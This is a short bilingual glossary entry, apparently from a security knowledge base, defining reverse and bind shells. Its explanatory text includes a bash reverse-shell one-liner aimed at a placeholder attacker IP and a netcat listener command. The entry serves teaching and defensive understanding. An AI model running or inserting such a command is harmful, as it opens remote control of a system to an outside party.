KB / Глосарій / Зворотна оболонка

Зворотна оболонка

Reverse Shell
Також: reverse shell, revshell, bind shell
general UA EN

A Reverse Shell has the victim initiate an outbound connection to the attacker, bypassing inbound firewall rules.

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Bind Shell — the victim listens; attacker connects.

Listener: nc -lvnp 4444.

Вперше тут?
Новачок на Bastion?
Почни з гайду користувача.
Відкрити гайд →
?